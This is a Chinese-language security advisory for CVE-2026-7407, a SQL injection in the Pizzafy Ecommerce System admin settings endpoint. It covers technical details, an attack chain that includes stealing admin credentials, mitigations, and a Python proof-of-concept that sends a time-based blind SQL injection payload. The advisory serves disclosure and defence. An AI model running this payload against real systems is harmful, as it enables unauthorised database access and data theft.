CVE-2026-7407 Pizzafy电商系统SQL注入漏洞

漏洞信息

漏洞编号

CVE-2026-7407

漏洞类型

SQL注入

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

SourceCodester Pizzafy Ecommerce System

漏洞概述

SourceCodester Pizzafy电商系统1.0版本中存在安全漏洞。该漏洞位于组件Setting Handler的/pizzafy/admin/ajax.php?action=save_settings文件中的save_settings函数。由于对用户输入处理不当，攻击者可以通过操纵该参数触发SQL注入漏洞。攻击可远程发起，且利用代码已公开披露，可能对系统造成数据泄露或破坏。

技术细节

该漏洞源于SourceCodester Pizzafy电商系统1.0版本在处理设置保存功能时，未能正确过滤用户提交的输入数据。具体来说，在`/pizzafy/admin/ajax.php`文件的`save_settings`动作中，程序直接将前端传递的参数拼接到SQL查询语句中，而未使用预编译语句或有效的过滤机制。由于CVSS向量显示需要高权限（PR:H），攻击者通常需要拥有管理员账户或能够访问后台设置页面的权限。一旦认证成功，攻击者可以向受影响参数注入恶意的SQL语句，从而绕过验证、读取敏感数据库信息（如用户凭证）、修改数据或执行其他数据库操作。由于该漏洞可被远程利用且已有公开的Exploit，风险不容忽视。

攻击链分析

STEP 1

1. 侦察与访问

攻击者识别出目标运行SourceCodester Pizzafy电商系统1.0版本，并定位到后台管理入口。

STEP 2

2. 身份认证

由于漏洞需要高权限（PR:H），攻击者通过弱口令猜测、社会工程学或其他手段获取管理员账户凭证并登录系统。

STEP 3

3. 构造恶意请求

攻击者分析`/pizzafy/admin/ajax.php?action=save_settings`接口，并在请求参数中注入SQL恶意代码（如UNION查询或时间盲注语句）。

STEP 4

4. 执行注入攻击

服务器端接收到请求，未对参数进行过滤直接拼接到SQL语句中执行，导致数据库返回敏感信息或执行非预期命令。

STEP 5

5. 数据窃取与控制

攻击者利用获取的数据库权限进一步提取用户数据、篡改系统配置或维持后门访问。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL configuration
target_url = "http://example.com/pizzafy/admin/ajax.php"

# Vulnerable parameter payload (Time-based blind SQL injection example)
# This assumes the 'site_title' or similar parameter in save_settings is injectable
payload_data = {
    "action": "save_settings",
    "site_title": "Pizzafy' AND (SELECT * FROM (SELECT(SLEEP(5)))a)-- -"
}

# Headers (Authentication might be required as per PR:H)
headers = {
    "Cookie": "PHPSESSID=admin_session_id_here; user_level=admin",
    "Content-Type": "application/x-www-form-urlencoded"
}

try:
    response = requests.post(target_url, data=payload_data, headers=headers, timeout=10)
    
    # Analyze response time or content to confirm injection
    if response.elapsed.total_seconds() >= 5:
        print("[+] Potential SQL Injection vulnerability confirmed (Time-based).")
    else:
        print("[-] Vulnerability not detected or response time too short.")
        
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

SourceCodester Pizzafy Ecommerce System 1.0

防御指南

临时缓解措施

在官方补丁发布前，建议在Web应用防火墙（WAF）中部署规则，拦截针对`/admin/ajax.php`路径的包含SQL关键字的POST请求。同时，严格限制管理员后台的访问来源IP，并强制所有管理员使用强密码以降低被入侵的风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7407
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7407
3 Details https://www.cvedetails.com/cve/CVE-2026-7407/
4 VulDB https://vuldb.com/cve/CVE-2026-7407
5 Link https://github.com/r3ng4f/Pizzafy_1/blob/main/01-exploit.md
6 Link https://vuldb.com/submit/803613
7 Link https://vuldb.com/vuln/360141
8 Link https://vuldb.com/vuln/360141/cti
9 Link https://www.sourcecodester.com/